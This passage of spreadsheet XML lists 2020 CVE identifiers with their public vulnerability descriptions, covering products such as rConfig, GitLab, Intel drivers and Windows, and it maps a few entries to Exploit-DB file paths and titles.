    <t>rConfig 3.9.4 is vulnerable to remote code execution due to improper validation in the file upload functionality. vendor.crud.php accepts a file upload by checking content-type without considering the file extension and header. Thus, an attacker can exploit this by uploading a .php file to vendor.php that contains arbitrary PHP code and changing the content-type to image/gif.</t>
  </si>
  <si>
    <t>CVE-2020-12256</t>
  </si>
  <si>
    <t>rConfig 3.9.4 is vulnerable to reflected XSS. The devicemgmnt.php file improperly validates user input. An attacker can exploit this by crafting arbitrary JavaScript in the deviceId GET parameter to devicemgmnt.php.</t>
  </si>
  <si>
    <t>CVE-2020-12257</t>
  </si>
  <si>
    <t>rConfig 3.9.4 is vulnerable to cross-site request forgery (CSRF) because it lacks implementation of CSRF protection such as a CSRF token. An attacker can leverage this vulnerability by creating a form (add a user, delete a user, or edit a user).</t>
  </si>
  <si>
    <t>CVE-2020-12258</t>
  </si>
  <si>
    <t>rConfig 3.9.4 is vulnerable to session fixation because session expiry and randomization are mishandled. The application can reuse a session via PHPSESSID. Also, an attacker can exploit this vulnerability in conjunction with CVE-2020-12256 or CVE-2020-12259.</t>
  </si>
  <si>
    <t>CVE-2020-12259</t>
  </si>
  <si>
    <t>rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php.</t>
  </si>
  <si>
    <t>CVE-2020-1226</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1225.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48516.txt</t>
  </si>
  <si>
    <t>Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)</t>
  </si>
  <si>
    <t>2020-05-26</t>
  </si>
  <si>
    <t>CVE-2020-12261</t>
  </si>
  <si>
    <t>Open-AudIT 3.3.0 allows an XSS attack after login.</t>
  </si>
  <si>
    <t>CVE-2020-12262</t>
  </si>
  <si>
    <t>Intelbras TIP200 60.61.75.15, TIP200LITE 60.61.75.15, and TIP300 65.61.75.15 devices allow /cgi-bin/cgiServer.exx?page= XSS.</t>
  </si>
  <si>
    <t>CVE-2020-12265</t>
  </si>
  <si>
    <t>The decompress package before 4.2.1 for Node.js is vulnerable to Arbitrary File Write via ../ in an archive member, when a symlink is used, because of Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-12266</t>
  </si>
  <si>
    <t>An issue was discovered where there are multiple externally accessible pages that do not require any sort of authentication, and store system information for internal usage. The devices automatically query these pages to update dashboards and other statistics, but the pages can be accessed externally without any authentication. All the pages follow the naming convention live_(string).shtml. Among the information disclosed is: interface status logs, IP address of the device, MAC address of the device, model and current firmware version, location, all running processes, all interfaces and their statuses, all current DHCP leases and the associated hostnames, all other wireless networks in range of the router, memory statistics, and components of the configuration of the device such as enabled features. Affected devices: Affected devices are: Wavlink WN530HG4, Wavlink WN575A3, Wavlink WN579G3,Wavlink WN531G3, Wavlink WN533A8, Wavlink WN531A6, Wavlink WN551K1, Wavlink WN535G3, Wavlink WN530H4, Wavlink WN57X93, WN572HG3, Wavlink WN578A2, Wavlink WN579G3, Wavlink WN579X3, and Jetstream AC3000/ERAC3000</t>
  </si>
  <si>
    <t>CVE-2020-12267</t>
  </si>
  <si>
    <t>setMarkdown in Qt before 5.14.2 has a use-after-free related to QTextMarkdownImporter::insertBlock.</t>
  </si>
  <si>
    <t>CVE-2020-12268</t>
  </si>
  <si>
    <t>jbig2_image_compose in jbig2_image.c in Artifex jbig2dec before 0.18 has a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-1227</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1198, CVE-2020-1345, CVE-2020-1482, CVE-2020-1514, CVE-2020-1575.</t>
  </si>
  <si>
    <t>CVE-2020-12270</t>
  </si>
  <si>
    <t>** DISPUTED ** React Native Bluetooth Scan in Bluezone 1.0.0 uses six-character alphanumeric IDs, which might make it easier for remote attackers to interfere with COVID-19 contact tracing by using many IDs. NOTE: the vendor disputes the relevance of this report because the recipient of an F1 alert will know it was a false alert if contact-history comparison fails (i.e., an F0 is not actually part of the contact history obtained from the device of this recipient, or this recipient is not actually part of the contact history obtained from the device of an F0).</t>
  </si>
  <si>
    <t>CVE-2020-12271</t>
  </si>
  <si>
    <t>A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-04-25 on Sophos XG Firewall devices, as exploited in the wild in April 2020. This affected devices configured with either the administration (HTTPS) service or the User Portal exposed on the WAN zone. A successful attack may have caused remote code execution that exfiltrated usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords)</t>
  </si>
  <si>
    <t>CVE-2020-12272</t>
  </si>
  <si>
    <t>OpenDMARC through 1.3.2 and 1.4.x allows attacks that inject authentication results to provide false information about the domain that originated an e-mail message. This is caused by incorrect parsing and interpretation of SPF/DKIM authentication results, as demonstrated by the example.net(.example.com substring.</t>
  </si>
  <si>
    <t>CVE-2020-12273</t>
  </si>
  <si>
    <t>In TestLink 1.9.20, a crafted login.php viewer parameter exposes cleartext credentials.</t>
  </si>
  <si>
    <t>CVE-2020-12274</t>
  </si>
  <si>
    <t>In TestLink 1.9.20, the lib/cfields/cfieldsExport.php goback_url parameter causes a security risk because it depends on client input and is not constrained to lib/cfields/cfieldsView.php at the web site associated with the session.</t>
  </si>
  <si>
    <t>CVE-2020-12275</t>
  </si>
  <si>
    <t>GitLab 12.6 through 12.9 is vulnerable to a privilege escalation that allows an external user to create a personal snippet through the API.</t>
  </si>
  <si>
    <t>CVE-2020-12276</t>
  </si>
  <si>
    <t>GitLab 9.5.9 through 12.9 is vulnerable to stored XSS in an admin notification feature.</t>
  </si>
  <si>
    <t>CVE-2020-12277</t>
  </si>
  <si>
    <t>GitLab 10.8 through 12.9 has a vulnerability that allows someone to mirror a repository even if the feature is not activated.</t>
  </si>
  <si>
    <t>CVE-2020-12278</t>
  </si>
  <si>
    <t>An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1352.</t>
  </si>
  <si>
    <t>CVE-2020-12279</t>
  </si>
  <si>
    <t>An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1353.</t>
  </si>
  <si>
    <t>CVE-2020-1228</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries, aka 'Windows DNS Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-0836.</t>
  </si>
  <si>
    <t>CVE-2020-12280</t>
  </si>
  <si>
    <t>iSmartgate PRO 1.5.9 is vulnerable to CSRF that allows remote attackers to open/close a specified garage door/gate via /isg/opendoor.php.</t>
  </si>
  <si>
    <t>CVE-2020-12281</t>
  </si>
  <si>
    <t>iSmartgate PRO 1.5.9 is vulnerable to CSRF that allows remote attackers to create a new user via /index.php.</t>
  </si>
  <si>
    <t>CVE-2020-12282</t>
  </si>
  <si>
    <t>iSmartgate PRO 1.5.9 is vulnerable to CSRF via the busca parameter in the form used for searching for users, accessible via /index.php. (This can be combined with reflected XSS.)</t>
  </si>
  <si>
    <t>CVE-2020-12283</t>
  </si>
  <si>
    <t>Sourcegraph before 3.15.1 has a vulnerable authentication workflow because of improper validation in the SafeRedirectURL method in cmd/frontend/auth/redirect.go, such as for the //foo//example.com substring.</t>
  </si>
  <si>
    <t>CVE-2020-12284</t>
  </si>
  <si>
    <t>cbs_jpeg_split_fragment in libavcodec/cbs_jpeg.c in FFmpeg 4.1 and 4.2.2 has a heap-based buffer overflow during JPEG_MARKER_SOS handling because of a missing length check.</t>
  </si>
  <si>
    <t>CVE-2020-12286</t>
  </si>
  <si>
    <t>In Octopus Deploy before 2019.12.9 and 2020 before 2020.1.12, the TaskView permission is not scoped to any dimension. For example, a scoped user who is scoped to only one tenant can view server tasks scoped to any other tenant.</t>
  </si>
  <si>
    <t>CVE-2020-12287</t>
  </si>
  <si>
    <t>Incorrect permissions in the Intel(R) Distribution of OpenVINO(TM) Toolkit before version 2020.2 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12288</t>
  </si>
  <si>
    <t>Protection mechanism failure in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12289</t>
  </si>
  <si>
    <t>Out-of-bounds write in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-1229</t>
  </si>
  <si>
    <t>A security feature bypass vulnerability exists in Microsoft Outlook when Office fails to enforce security settings configured on a system, aka 'Microsoft Outlook Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12290</t>
  </si>
  <si>
    <t>Improper access control in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12291</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12292</t>
  </si>
  <si>
    <t>Improper conditions check in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12293</t>
  </si>
  <si>
    <t>Improper control of a resource through its lifetime in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12294</t>
  </si>
  <si>
    <t>Insufficient control flow management in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12295</t>
  </si>
  <si>
    <t>Improper input validation in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12296</t>
  </si>
  <si>
    <t>CVE-2020-12297</t>
  </si>
  <si>
    <t>Improper access control in Installer for Intel(R) CSME Driver for Windows versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel TXE 3.1.80, 4.0.30 may allow an authenticated user to potentially enable escalation of privileges via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12299</t>
  </si>
  <si>
    <t>Improper input validation in BIOS firmware for Intel(R) Server Board Families S2600ST, S2600BP and S2600WF may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-1230</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1260.</t>
  </si>
  <si>
    <t>CVE-2020-12300</t>
  </si>
  <si>
    <t>Uninitialized pointer in BIOS firmware for Intel(R) Server Board Families S2600CW, S2600KP, S2600TP, and S2600WT may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12301</t>
  </si>
  <si>
    <t>Improper initialization in BIOS firmware for Intel(R) Server Board Families S2600ST, S2600BP and S2600WF may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12302</t>
  </si>
  <si>
    <t>Improper permissions in the Intel(R) Driver &amp; Support Assistant before version 20.7.26.7 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12303</t>
  </si>
  <si>
    <t>Use after free in DAL subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel(R) TXE 3.1.80, 4.0.30 may allow an authenticated user to potentially enable escalation of privileges via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12304</t>
  </si>
  <si>
    <t>Improper access control in Installer for Intel(R) DAL SDK before version 2.1 for Windows may allow an authenticated user to potentially enable escalation of privileges via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12306</t>
  </si>
  <si>
    <t>Incorrect default permissions in the Intel(R) RealSense(TM) D400 Series Dynamic Calibration Tool before version 2.11, may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12307</t>
  </si>
  <si>
    <t>Improper permissions in some Intel(R) High Definition Audio drivers before version 9.21.00.4561 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12308</t>
  </si>
  <si>
    <t>Improper access control for the Intel(R) Computing Improvement Program before version 2.4.5982 may allow an unprivileged user to potentially enable information disclosure via network access.</t>
  </si>
  <si>
    <t>CVE-2020-12309</t>
  </si>
  <si>
    <t>Insufficiently protected credentialsin subsystem in some Intel(R) Client SSDs and some Intel(R) Data Center SSDs may allow an unauthenticated user to potentially enable information disclosure via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-1231</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1233, CVE-2020-1235, CVE-2020-1265, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334.</t>
  </si>
  <si>
    <t>CVE-2020-12310</t>
  </si>
  <si>
    <t>Insufficient control flow managementin firmware in some Intel(R) Client SSDs and some Intel(R) Data Center SSDs may allow an unauthenticated user to potentially enable information disclosure via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-12311</t>
  </si>
  <si>
    <t>CVE-2020-12312</t>
  </si>
  <si>
    <t>Improper buffer restrictions in the Intel(R) Stratix(R) 10 FPGA firmware provided with the Intel(R) Quartus(R) Prime Pro software before version 20.2 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-12313</t>
  </si>
  <si>
    <t>Insufficient control flow management in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-12314</t>
  </si>
  <si>
    <t>Improper input validation in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-12315</t>
  </si>
  <si>
    <t>Path traversal in the Intel(R) EMA before version 1.3.3 may allow an unauthenticated user to potentially enable escalation of privilege via network access.</t>
  </si>
  <si>
    <t>CVE-2020-12316</t>
  </si>
  <si>
    <t>Insufficiently protected credentials in the Intel(R) EMA before version 1.3.3 may allow an authorized user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12317</t>
  </si>
  <si>
    <t>Improper buffer restriction in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-12318</t>
  </si>
  <si>
    <t>Protection mechanism failure in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12319</t>
  </si>
  <si>
    <t>Insufficient control flow management in some Intel(R) PROSet/Wireless WiFi products before version 21.110 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-1232</t>
  </si>
  <si>
    <t>CVE-2020-12320</t>
  </si>
  <si>
    <t>Uncontrolled search path in Intel(R) SCS Add-on for Microsoft* SCCM before version 2.1.10 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12321</t>
  </si>
  <si>
    <t>Improper buffer restriction in some Intel(R) Wireless Bluetooth(R) products before version 21.110 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-12322</t>
  </si>
  <si>
    <t>Improper input validation in some Intel(R) Wireless Bluetooth(R) products before version 21.110 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-12323</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) ADAS IE before version ADAS_IE_1.0.766 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12324</t>
  </si>
  <si>
    <t>Protection mechanism failure in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12325</t>
  </si>
  <si>
    <t>Improper buffer restrictions in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12326</t>
  </si>
  <si>
    <t>Improper initialization in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12327</t>
  </si>
  <si>
    <t>Insecure default variable initialization in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow a privileged user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12328</t>
  </si>
  <si>
    <t>Protection mechanism failure in some Intel(R) Thunderbolt(TM) DCH drivers for Windows* before version 72 may allow a privileged user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12329</t>
  </si>
  <si>
    <t>Uncontrolled search path in the Intel(R) VTune(TM) Profiler before version 2020 Update 1 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-1233</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1231, CVE-2020-1235, CVE-2020-1265, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334.</t>
  </si>
  <si>
    <t>CVE-2020-12330</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) Falcon 8+ UAS AscTec Thermal Viewer, all versions, may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12331</t>
  </si>
  <si>
    <t>Improper access controls in Intel Unite(R) Cloud Service client before version 4.2.12212 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12332</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) HID Event Filter Driver, all versions, may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12333</t>
  </si>
  <si>
    <t>Insufficiently protected credentials in the Intel(R) QAT for Linux before version 1.7.l.4.10.0 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12334</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) Advisor tools before version 2020 Update 2 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12335</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) Processor Identification Utility before version 6.4.0603 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12336</t>
  </si>
  <si>
    <t>Insecure default variable initialization in firmware for some Intel(R) NUCs may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12337</t>
  </si>
  <si>
    <t>Improper buffer restrictions in firmware for some Intel(R) NUCs may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12338</t>
  </si>
  <si>
    <t>Insufficient control flow management in the Open WebRTC Toolkit before version 4.3.1 may allow an unauthenticated user to potentially enable escalation of privilege via network access.</t>
  </si>
  <si>
    <t>CVE-2020-12339</t>
  </si>
  <si>
    <t>Insufficient control flow management in the API for the Intel(R) Collaboration Suite for WebRTC before version 4.3.1 may allow an authenticated user to potentially enable escalation of privilege via network access.</t>
  </si>
  <si>
    <t>CVE-2020-1234</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12345</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12346</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) Battery Life Diagnostic Tool before version 1.0.7 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12347</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable escalation of privilege via network access.</t>
  </si>
  <si>
    <t>CVE-2020-12349</t>
  </si>
  <si>
    <t>CVE-2020-1235</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1231, CVE-2020-1233, CVE-2020-1265, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334.</t>
  </si>
  <si>
    <t>exploits/linux/remote/49754.c</t>
  </si>
  <si>
    <t>Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution</t>
  </si>
  <si>
    <t>2021-04-08</t>
  </si>
  <si>
    <t>CVE-2020-12350</t>
  </si>
  <si>
    <t>Improper access control in the Intel(R) XTU before version 6.5.1.360 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12351</t>
  </si>
  <si>
    <t>Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-12352</t>
  </si>
  <si>
    <t>Improper access control in BlueZ may allow an unauthenticated user to potentially enable information disclosure via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-12353</t>
  </si>
  <si>
    <t>Improper permissions in the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable denial of service via network access.</t>
  </si>
  <si>
    <t>CVE-2020-12354</t>
  </si>
  <si>
    <t>Incorrect default permissions in Windows(R) installer in Intel(R) AMT SDK versions before 14.0.0.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12355</t>
  </si>
  <si>
    <t>Authentication bypass by capture-replay in RPMB protocol message authentication subsystem in Intel(R) TXE versions before 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-12356</t>
  </si>
  <si>
    <t>Out-of-bounds read in subsystem in Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12357</t>
  </si>
  <si>
    <t>Improper initialization in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12358</t>
  </si>
  <si>
    <t>Out of bounds write in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12359</t>
  </si>
  <si>
    <t>Insufficient control flow management in the firmware for some Intel(R) Processors may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-1236</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1208.</t>
  </si>
  <si>
    <t>CVE-2020-12360</t>
  </si>
  <si>
    <t>Out of bounds read in the firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12361</t>
  </si>
  <si>
    <t>Use after free in some Intel(R) Graphics Drivers before version 15.33.51.5146 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12362</t>
  </si>
  <si>
    <t>Integer overflow in the firmware for some Intel(R) Graphics Drivers for Windows * before version 26.20.100.7212 and before Linux kernel version 5.5 may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12363</t>
  </si>
  <si>
    <t>Improper input validation in some Intel(R) Graphics Drivers for Windows* before version 26.20.100.7212 and before Linux kernel version 5.5 may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12364</t>
  </si>
  <si>
    <t>Null pointer reference in some Intel(R) Graphics Drivers for Windows* before version 26.20.100.7212 and before version Linux kernel version 5.5 may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12365</t>
  </si>
  <si>
    <t>Untrusted pointer dereference in some Intel(R) Graphics Drivers before versions 15.33.51.5146, 15.45.32.5145, 15.36.39.5144 and 15.40.46.5143 may allow an authenticated user to potentially denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12366</t>
  </si>
  <si>
    <t>Insufficient input validation in some Intel(R) Graphics Drivers before version 27.20.100.8587 may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12367</t>
  </si>
  <si>
    <t>Integer overflow in some Intel(R) Graphics Drivers before version 26.20.100.8476 may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12368</t>
  </si>
  <si>
    <t>Integer overflow in some Intel(R) Graphics Drivers before version 26.20.100.8141 may allow a privileged user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12369</t>
  </si>
  <si>
    <t>Out of bound write in some Intel(R) Graphics Drivers before version 26.20.100.8336 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-1237</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12370</t>
  </si>
  <si>
    <t>Untrusted pointer dereference in some Intel(R) Graphics Drivers before version 26.20.100.8141 may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12371</t>
  </si>
  <si>
    <t>Divide by zero in some Intel(R) Graphics Drivers before version 26.20.100.8141 may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12372</t>
  </si>
  <si>
    <t>Unchecked return value in some Intel(R) Graphics Drivers before version 26.20.100.8141 may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12373</t>
  </si>
  <si>
    <t>Expired pointer dereference in some Intel(R) Graphics Drivers before version 26.20.100.8141 may allow a privileged user to potentially enable a denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12374</t>
  </si>
  <si>
    <t>Buffer overflow in the BMC firmware for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.47 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12375</t>
  </si>
  <si>
    <t>Heap overflow in the BMC firmware for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.47 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12376</t>
  </si>
  <si>
    <t>Use of hard-coded key in the BMC firmware for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.47 may allow authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12377</t>
  </si>
  <si>
    <t>Insufficient input validation in the BMC firmware for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.47 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-1238</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1239.</t>
  </si>
  <si>
    <t>CVE-2020-12380</t>
  </si>
  <si>
    <t>Out of bounds read in the BMC firmware for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.47 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12384</t>
  </si>
  <si>
    <t>Improper access control in some Intel(R) Graphics Drivers before version 26.20.100.8476 may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-12385</t>
  </si>
  <si>
